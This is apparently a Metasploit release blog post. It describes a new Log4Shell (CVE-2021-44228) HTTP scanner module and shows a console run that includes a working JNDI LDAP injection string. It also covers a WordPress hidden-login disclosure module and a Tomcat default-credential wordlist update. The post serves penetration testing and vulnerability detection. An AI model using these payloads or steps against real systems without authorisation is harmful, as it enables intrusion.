Last updated at Fri, 17 Dec 2021 22:53:06 GMT
Log4Shell - Log4j HTTP Scanner
Versions of Apache Log4j impacted by CVE-2021-44228, which allow JNDI features to be used in configuration, log messages, and parameters, do not protect against attacker-controlled LDAP and other JNDI-related endpoints.
This module will scan an HTTP endpoint for the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying instances that are vulnerable via one of the pre-determined HTTP request injection points.
This module has been successfully tested with:
- Apache Solr
- Apache Struts2
- Spring Boot
msf6 > use auxiliary/scanner/http/log4shell_scanner
msf6 auxiliary(scanner/http/log4shell_scanner) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(scanner/http/log4shell_scanner) > set SRVHOST 192.168.159.128
SRVHOST => 192.168.159.128
msf6 auxiliary(scanner/http/log4shell_scanner) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(scanner/http/log4shell_scanner) > set TARGETURI /struts2-showcase/
TARGETURI => /struts2-showcase/
msf6 auxiliary(scanner/http/log4shell_scanner) > run
[*] Started service listener on 192.168.159.128:389
[+] Log4Shell found via /struts2-showcase/%24%7bjndi%3aldap%3a%24%7b%3a%3a-/%7d/192.168.159.128%3a389/r7yol50kgg7be/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d/ (java: BellSoft_11.0.13)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/log4shell_scanner) >
For more details, please see the official Rapid7 Log4Shell CVE-2021-44228 analysis.
New module content (2)
- Log4Shell HTTP Scanner by Spencer McIntyre, which exploits CVE-2021-44228 - This module performs a generic scan of a given target for the Log4Shell vulnerability by injecting it into a series of Header fields as well as the URI path.
- WordPress WPS Hide Login Login Page Revealer by h00die and thalakus, which exploits CVE-2021-24917 - A new PR for CVE-2021-24917 was added, which is an information disclosure bug in the WPS Hide Login WordPress plugin before 1.9.1. This vulnerability allows unauthenticated users to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php. Additionally, several WordPress modules were updated to more descriptively report which plugin they found as being vulnerable on a given target.
Enhancements and features
- #15842 from adfoster-r7 - Several libraries within the lib folder have now been updated to declare Meterpreter compatibility requirements, which will allow users to more easily determine when they are using a library that the current session does not support.
- #15936 from cmaruti - The wordlists for Tomcat Manager have been updated with new default usernames and passwords that can be used by various scanner and exploit modules when trying to find and exploit Tomcat Manager installations with default usernames and/or passwords.
- #15944 from sjanusz-r7 - Adds long form option names to the sessions command, for example sessions --upgrade 1.
- #15965 from adfoster-r7 - Adds a TCP URI scheme for setting RHOSTS, which allows one to specify the username, password, and port. For example, a string such as tcp://user:a b c@example.com would translate into the username user, the password a b c, and the host example.com on the default port used by the module in question.
- #15779 from k0pak4 - The code of lib/msf/core/auxiliary/report.rb has been improved to fix an error whereby report_vuln() would crash if vuln was nil prior to calling framework.db.report_vuln_attempt(). This has been fixed by checking the value of vuln and raising a ValidationError if it's set to nil.
- #15945 from zeroSteiner - This change fixes the Meterpreter > ls command, in the case where one of the files or folders within the listed folder was inaccessible.
- #15952 from sjanusz-r7 - This PR adds a fix for the creds -d command which crashed on some
- #15957 from sjanusz-r7 - A bug existed whereby a value was not correctly checked to ensure it was not nil prior to being used when saving credentials with Kiwi. This has been addressed by adding improved error checking and handling.
- #15963 from adfoster-r7 - A bug has been fixed that prevented users using Go 1.17 from being able to run Go modules within Metasploit. Additionally, the boot process has been altered so that messages about modules not loading are now logged to disk, so as to not confuse users with errors in modules that they don't plan to use.
As always, you can update to the latest Metasploit Framework with
and you can get more details on the changes since the last blog post from
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).